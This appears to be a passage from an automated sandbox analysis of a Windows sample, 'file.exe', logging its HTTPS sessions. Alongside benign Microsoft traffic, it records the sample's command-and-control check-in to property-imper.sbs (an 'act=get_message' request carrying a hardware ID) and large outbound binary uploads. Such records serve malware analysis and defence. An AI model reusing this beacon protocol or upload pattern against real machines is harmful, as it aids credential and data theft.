                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: ff 5b d9 33 82 3b 81 93 b5 ac 78 86 32 4c f7 38 95 aa 95 e2 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0
                                                                                                                                                                                                Data Ascii: [3;x2L8Imu6~`)p<|<Q<1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,
                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: cd c1 84 55 b6 86 b9 f3 5e ce 69 96 42 ca 47 8e e4 8b 61 de 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d
                                                                                                                                                                                                Data Ascii: U^iBGacC|.-NKtajk&F''UN O$()Fz|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]
                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: ae 73 17 55 80 ce f9 e4 2a ee d6 06 6e b9 ef d5 b1 db 1b 28 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c
                                                                                                                                                                                                Data Ascii: sU*n(iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l
                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: 1e 61 f0 6b 98 94 9b ec 33 dc 37 90 f3 aa a4 ec 73 ff 34 51 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d
                                                                                                                                                                                                Data Ascii: ak37s4Q,I=.iy|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf*7_P9wFLf:H:;&QDq=|*8!=t7ID3us5u;I#^
                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: ce a3 67 9f a6 98 19 0e 4c 1c 8d d9 55 fd f7 fd 6e 0c 29 49 cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3
                                                                                                                                                                                                Data Ascii: gLUn)ITL#}{(plm2)sEXW8:GXf&B$8O+X*ozEanbG:K;Ls={KZUe"X(n]Pg83S*tE/%YK1>R Rf7l.9R wTv;@pH!S
                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: 63 0a 6e ae 2c 85 5a f2 28 79 0c db fc bf 6b c7 fe e7 a8 d5 e9 ed f3 df 6e 54 93 d2 95 15 ff b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 96 a5 58 16 36 ec e7 af 56 ff df 05 be cc c3 cc 92
                                                                                                                                                                                                Data Ascii: cn,Z(yknT8!(.jrGx;<Z2'(PS4|G|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJX6V
                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: 75 35 2d ae 9c 9d 44 3e 5a da 5c d1 db fa 64 ab f6 cd 2f 0b 42 4a 82 8c 15 db 88 47 07 87 f3 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 5a 38 40 2c 41 20 8e f2 6e ca f6 5f 49 1b c0 02 72
                                                                                                                                                                                                Data Ascii: u5-D>Z\d/BJGlz;m#(aobSeL&)Dh$N]N\}am|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/Z8@,A n_Ir
                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: c2 0a 0c 3c c4 97 64 67 d3 74 70 64 93 d8 fe ff ff c4 84 33 80 d3 76 f4 03 b2 b8 73 a8 5d 86 a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 b3 64 17 1b 53 a7 11 ec 65 4b bc 07 e6 35 3a 89 90
                                                                                                                                                                                                Data Ascii: <dgtpd3vs]|.kOT4V*=Og>zAoy?QwKL,.6Ed}7X 09G8*s%KcGTmg45Vq7[qv>|fTS*RyAQ pQ!A+;v9dSeK5:
                                                                                                                                                                                                2024-11-23 15:53:19 UTC15331OUTData Raw: c5 5b 44 23 de c2 e2 99 96 c2 95 64 11 d2 ae f5 9b 46 da 6b 0e ea 99 7c 91 ce 23 27 23 e8 2f 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 7d ec 15 61 10 e2 3d 37 2b 0f 87 f9 41 af 35 93 26
                                                                                                                                                                                                Data Ascii: [D#dFk|#'#/oJNZ~!kgI:KoNfB|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s}a=7+A5&
                                                                                                                                                                                                2024-11-23 15:53:24 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:24 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=nosrd0b9phpo6th5rcf03351un; expires=Wed, 19-Mar-2025 09:40:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RulislQuKTQQHjzizVxDKrVBMHnorLQbm5JXYutnUer1wPtR2%2F83CNTPKTGqL8K6o%2F%2FrFpG86yAoajk%2BLDp8Y7Cxt0pG56PrhRXROCEblC0aPrvW5ZvyJWtUKcbZgVk1Rr9fXA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e7254db08391869-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1496&sent=321&recv=587&lost=0&retrans=0&sent_bytes=2846&recv_bytes=551891&delivery_rate=1901041&cwnd=232&unsent_bytes=0&cid=a650e01adb2c35d4&ts=5094&x=0"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.4497364.175.87.197443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:20 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=t+fsTBSdmLwTfcf&MD=sOX2zuT8 HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                2024-11-23 15:53:21 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                MS-CorrelationId: 8abc20ea-ebf3-40bd-8a71-f169b36e5ba9
                                                                                                                                                                                                MS-RequestId: b2f99db9-b89b-4617-b9a7-13fc6268d3d4
                                                                                                                                                                                                MS-CV: olOgN4QppEing5yD.0
                                                                                                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:20 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 24490
                                                                                                                                                                                                2024-11-23 15:53:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                2024-11-23 15:53:21 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.449742172.67.162.844434280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:26 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 88
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-23 15:53:26 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 32 37 44 32 43 32 33 37 44 38 43 44 43 35 34 41 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=27D2C237D8CDC54AD7CBBD6DF28D3732
                                                                                                                                                                                                2024-11-23 15:53:26 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:26 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=gvdvu6fsmtju74ume0t8j3dm3j; expires=Wed, 19-Mar-2025 09:40:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MnaZ5u77J5uKyeuamk33CC8VFLMUuFE9stv5VC4p79OsYuto1AIXDKk65Ge34q9Tdtii0VHURhPco1%2B6M5clpFEA7VcWAA9MzOz1%2BdQCj3fcfHnyNuOuvP%2F7BN7qBvJGLhm%2FYe4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e7255036c994406-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=990&delivery_rate=1640449&cwnd=186&unsent_bytes=0&cid=0d62977d81deb034&ts=624&x=0"
                                                                                                                                                                                                2024-11-23 15:53:26 UTC295INData Raw: 31 32 30 0d 0a 4f 48 35 2f 52 67 30 35 72 69 54 6e 4d 42 42 36 51 4f 6d 6c 32 51 61 64 4d 64 72 4e 42 77 32 39 4e 79 6a 72 6c 37 70 42 71 47 4a 6a 42 56 30 7a 4c 77 4f 4d 54 4a 4e 45 59 45 41 63 78 76 6e 32 4e 36 55 45 39 50 38 32 4f 4a 4d 47 47 64 69 35 69 33 66 30 54 56 63 59 47 52 6f 69 58 63 74 43 79 56 56 6f 48 32 4c 46 68 37 39 79 76 77 76 71 34 53 56 6f 6e 77 30 5a 6c 72 76 42 59 39 31 41 41 6c 77 58 4d 6e 6c 4a 6c 48 6a 49 62 44 39 4c 65 4e 79 4c 36 7a 65 6f 48 2b 76 38 4e 43 4f 4d 41 58 54 45 35 4d 34 6b 79 51 39 6b 55 51 30 6e 59 31 33 42 53 63 6c 56 61 42 39 69 78 59 65 2f 63 72 38 4c 36 75 45 6c 61 4a 38 4e 47 4a 61 37 77 57 50 64 51 41 4a 63 46 7a 4a 35 53 5a 52 34 79 47 77 2f 53 58 48 48 6b 65 67 6f 72 77 58 75 34 7a 59 38 34 52 68 4f 67 76
                                                                                                                                                                                                Data Ascii: 120OH5/Rg05riTnMBB6QOml2QadMdrNBw29Nyjrl7pBqGJjBV0zLwOMTJNEYEAcxvn2N6UE9P82OJMGGdi5i3f0TVcYGRoiXctCyVVoH2LFh79yvwvq4SVonw0ZlrvBY91AAlwXMnlJlHjIbD9LeNyL6zeoH+v8NCOMAXTE5M4kyQ9kUQ0nY13BSclVaB9ixYe/cr8L6uElaJ8NGJa7wWPdQAJcFzJ5SZR4yGw/SXHHkegorwXu4zY84RhOgv
                                                                                                                                                                                                2024-11-23 15:53:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                9192.168.2.44975923.204.130.19443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:45 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                2024-11-23 15:53:45 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Server: Kestrel
                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                X-OSID: 2
                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                X-CCC: GB
                                                                                                                                                                                                Cache-Control: public, max-age=236379
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:45 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-CID: 2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                10192.168.2.44976623.204.130.19443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:47 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                2024-11-23 15:53:47 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                Cache-Control: public, max-age=236388
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:47 GMT
                                                                                                                                                                                                Content-Length: 55
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                2024-11-23 15:53:47 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                11192.168.2.44976113.107.246.634435824C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:47 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                Host: js.monitor.azure.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: cross-site
